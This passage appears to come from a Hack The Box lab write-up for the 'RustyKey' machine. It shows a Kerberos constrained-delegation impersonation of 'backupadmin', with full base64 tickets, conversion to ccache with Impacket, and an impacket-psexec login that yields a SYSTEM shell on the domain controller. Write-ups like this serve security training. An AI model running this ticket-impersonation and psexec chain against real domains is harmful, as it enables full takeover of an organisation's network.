[*] Got a TGS for 'backupadmin' to 'IT-Computer3$@RUSTYKEY.HTB'
[*] base64(ticket.kirbi):

      doIFtjCCBbKgAwIBBaEDAgEWooIEzzCCBMthggTHMIIEw6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMySjggSOMIIEiqADAgEXoQMCAQSiggR8BIIEeEvkaK30QJCJN081Tf7T20kugVg+wo0TGqewGi7SnuVQxmu4fJCSzIWASm2+CY473IchmPK6DIjLdtkWg6LLxbl6BjSMdn6BON/1JtPghb9KO5fS2Tb3FbMeg7ryXL6co2hGSjcFw17WPyO+mKr/Cg+MO/NAIB5MrT4ylEw4FUwu5wQxeOjXd+tgdiYZMfZ3hMItQZSvTuGGVzWLdXWJbpMegonmOlvTcm+s1I4zdC5e2CiazQqgT/7OFRBWTlGF54lI0rviYaHZIyWkTAx7KRLG1ZDLlHqWWLFpyeB2SEd3LxcD8h84ciT4XOEDSDAUxvvbTv5FfuTIeMDWC6V7W9DuUzbYS4VAbtMa5vS1iZxHEElqPibZw65L/uLJD/5RJfNzglmNRR43tn5NZnYbzBkjZe7MVpneaV/GHorZKYKjJVUCajWmrF/gcpqg1a0lkgxFfQDGUdSr0BK95ueMKqJONIOqkFwFSswxmOUAv2j3sJ0+fejJVkyWOPvR5iM54Rbd8EsYeU4fVI1mMzQTCz59RAVDFzb/IIjKpx224gWM55Y5j/UIQ13MJ5yDM3LVYrKu9o43D/rpHR22bUZG9oXeRLrSSXi8+2KPSUR5mDoYi8ehaSJxmIbNwSycjI4EqfjdifWgS1j/o3+9O17boK6SlyhaZAqNk+ARxYMj5itqYgc0LBaiAsA6zpXyubFQ58J9PcCVFHToi/Bf2iVbkKxE+pP2kIIzyniw+YGNLLzlPLAPI1CqtAYnrr1HIZ61hl/JBKEk9qzXeumXrWMD6tKqKjN2av/NxynLYWbq1KIUPYZNmYqF1H/pdUQYUfdoYp3vLVvFXTPrkYqvY41JAqnuFZ3Fk0PQaiyMBtPOuy7rsz3X7mTj2+hsOMQNoxPCyiSFA654KTlEv8xPbEJOPe3vjyBsPYTVRaLYXGVf+hL3sM8XU6Y49LIuO3E5wUd6fruPFs9y0Z5nwPgnTpEqhjwDhXziQIm0LWr4xzdK7yom7QDgs2jC/WhRCYOBObfCaxERha3BMEoymObyW+RZrcVeXNcgiNMWEcr5re8S3KbsBPuEPVOitSiAdWLpTwrQTy+d6yUbAcMWk6c+Y8jFiospjfaSNM+n2WeKmPTmdfxUsXKp9LhYJgiJ39pEqtMEm3SiJ/B/C9lAo8HLcLFtUDaZqEluHOlH/8QAXq7Fp4tE0qas+wNtug9+y7W2YGcza1nIY35tF0zD0JHDIlod+zH7sQbQUXixesn1TdTWpSqbEH9bRwqAfVmnBEgPUY5jAI05ygiwpxQOZcm9f/xjZjeajgtWOoZYPnNanNyRJYCxsytob2QH7/4Cq8HvvrCvEthV0EHPnp0dgrzXSRopexoqKaTo8+s5qxy98EngD16dQLI/AuT+kAuvJJu4bXankA+TKDMmFq+OhjYrJplOM9DCtQ6tO4XAYjsPQ2YRaRRV4i6oEr0XElAzqAbAhb5R8UWyNj9FHuo4sHVmcu5nbc23kQ4cOZrC7PDWoqqa1dZQtOE3qQvWwP6jgdIwgc+gAwIBAKKBxwSBxH2BwTCBvqCBuzCBuDCBtaAbMBmgAwIBF6ESBBAS2vRDwHKZtIOEWGm/aQZkoQ4bDFJVU1RZS0VZLkhUQqIYMBagAwIBCqEPMA0bC2JhY2t1cGFkbWluowcDBQBAoQAApREYDzIwMjUwNzAzMjIyODMzWqYRGA8yMDI1MDcwNDA4MjgzM1qnERgPMjAyNTA3MTAyMjI4MzNaqA4bDFJVU1RZS0VZLkhUQqkaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMyQ=

[*] Impersonating user 'backupadmin' to target SPN 'cifs/DC.rustykey.htb'
[*] Building S4U2proxy request for service: 'cifs/DC.rustykey.htb'
[*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11)
[*] Sending S4U2proxy request to domain controller fe80::d98:ec14:263a:b635%11:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/DC.rustykey.htb':

      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
PS C:\\tem> 

System Shell

We copy and paste the Base64-encoded ticket, decode it and redirect the output to a file:

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ echo 'doIGfjCCBnqgAwIBBaEDAgEWooIFjzCCBYthggWHMIIFg6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIiMCCgAwIBAqEZMBcbBGNpZnMbD0RDLnJ1c3R5a2V5Lmh0YqOCBUYwggVCoAMCARehAwIBBaKCBTQEggUw7LQkLwId5l3PkxV8orRg98Ea4MaP/k/SbQdNRvbSdDXqejWmkhfhvSPmDD0o50w3P0RG++hhqj66aFcAC3SFf4RREntnIvT0zXM8DHcGFBZx2uuWtGXp9pmfOu0rYjemykPYO2KxxSv613YR2z6whjp+cV3gZqNpoWvEy2VbUBD0uu3vtfjvDM2tjcxSphsy7zyB146Bnn/eitJTExjx61SlPwEYW3Z+HNSR8AxTA5JO0S60RnC88013gEFBYfvCUU5XHa6bWXaNfhFkgLaHaB1TZIJxFO0g6Ggw+sMzpaCJON2X62eRZQklrXv0L0I8awdJztiO6w8uZYC2O5ZXm1iITK97MwjD0qDUMo9p/YjKALLckulG5vI63DMljpdnyKjoY1V/kHCaUfXTW+CRAtRYXzHD0X4ooX8jiXsqlEYiZkfIJJG0TpZMo0jfqteEUraXitB+0f1UQAsOe3aeU6Ffko/2zVV9/D1ZrQhkdVTtrqwuajjOy3cLUepZ9C9x8zqcXgZ2EO3/CLOzGgtlN1PDKS0JSYtX4xpusf2CmQ7MZIVE/WcTDVOxTD6cW7ywaXTXlt32z8ae7QV0a4H6386Bsm3xCaqMR/WZE4lLHBSOlTNXHe6XVa+LyYzV/a0irfHwJFQmWSX/hy0r6kdce36wbMv5nDWwUXcsO4X71cjaXcj4wCnn70nk0aKpYpdpqBq2i5WTmOCl525s/vUGZNUu3KNEGoh7UQnLLHsBw8e9E0biVHQqIhSghB6QJlU8iUzVp1pVl8T4VvtJwKpJICIC6GYq8xnJ3b7V/t5JDq60JouaPqPMr1Wxnu6dvBstwPOvXRVVHAxMIfWBuPhZFVrVpyvCTGXTKzN8uqvidyc0skBUyv1rgrN62JqEkB9NtLp6fsYCSMA7Zix5Ey3VNWjH0P19eWbk9MOToAbDoAdbtnWaOf/A1C98IWCY34bQhHibsJNjZiHQBS7g2rxieT6dtXpXZMh+X3MvLqStccUD7LlyGsf2ogVZiU0xztlUCsaCJyTHWK1LViF8KgLrdsrwaMdD4sMq5TYOFt2Ko97APAsgHr1mxlvDFFZjESACbcI4vAzCWKsXpSFJFF4NQ2vLBX7RYWfHQrCCJiUvsjR/b/LUPLDZEvOkDhKZme2TPNaYT5W8DjJ5ExFRB0c+DZC4vuiIPQQztK4moNNrmqwOO4+cm0vPwr/6dZcGg3/NXVMargIcUp6soxSe+E7YgL4BXCLva0v+FAFhgqSIcpSGmPNk/zyM8uolk/WDrwJwNdqC+9ZrvlB/0GFjzdqNM2De7rgvvRV837Ulitdb+XpdaJr1B0+khOPhyOdzS0ZatMKRzhLI+TXluvnogYMiDEmY6N40TLWtdSt1WZy4bgLDxgbmaNrOT3h05/CbHyunC59H/SMnwBHnidrDZkFXEWZuwH9ekSpzcGRmN3ApABBF/3W7oKpS90I9H4wOviqkUMT5B8DohGGI/iey8eBJjY3JGlGN5OhSanZoh8Cb9dKjj0nMMtIBDYUyn4H6RJyfhU6vXY3GA662k1Ww7HDGQIttvLUSVG3VJhF1yor+NmhS+qk29REq/tR1Q1b2O06O6ne4Kx+czRZvITEzRLwQl48ohatMUg9pRWlnUNG176vr3qn5GaaGP3yvDgLbXmq4K1dq5faUBigusVDYtS0+2Cd9WYAv/nGzzRQOnHFOSv9ixXBiCldIaZ8YI8m1PkUpea4Qlsfl0OjE5ST8KYvyWdKij7K0cNmc4xua7CQH4L+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAaCndPJNJqaUEbbSBSDenXoQ4bDFJVU1RZS0VZLkhUQqIYMBagAwIBCqEPMA0bC2JhY2t1cGFkbWluowcDBQBApQAApREYDzIwMjUwNzAzMjIyODMzWqYRGA8yMDI1MDcwNDA4MjgzM1qnERgPMjAyNTA3MTAyMjI4MzNaqA4bDFJVU1RZS0VZLkhUQqkiMCCgAwIBAqEZMBcbBGNpZnMbD0RDLnJ1c3R5a2V5Lmh0Yg==' | base64 -d > backupadmin.kirbi

We then use the ticketConverter.py from the Impacket suite to convert the ticket into .ccache format:

└─$ impacket-ticketConverter backupadmin.kirbi backupadmin.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

We export the ticket and use the psexec.py from the Impacket suite to get a SYSTEM shell on the domain controller:

└─$ export KRB5CCNAME=backupadmin.ccache 

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ impacket-psexec RUSTYKEY.HTB/backupadmin@DC.RUSTYKEY.HTB -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.RUSTYKEY.HTB.....
[*] Found writable share ADMIN$
[*] Uploading file tmhSOAtU.exe
[*] Opening SVCManager on DC.RUSTYKEY.HTB.....
[*] Creating service ycKx on DC.RUSTYKEY.HTB.....
[*] Starting service ycKx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32> whoami
nt authority\\system

C:\\Windows\\system32> 

and we have root.txt

Directory of C:\\Users\\Administrator\\Desktop

06/24/2025  10:00 AM    <DIR>          .
06/24/2025  10:00 AM    <DIR>          ..
07/02/2025  03:32 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,785,824,768 bytes free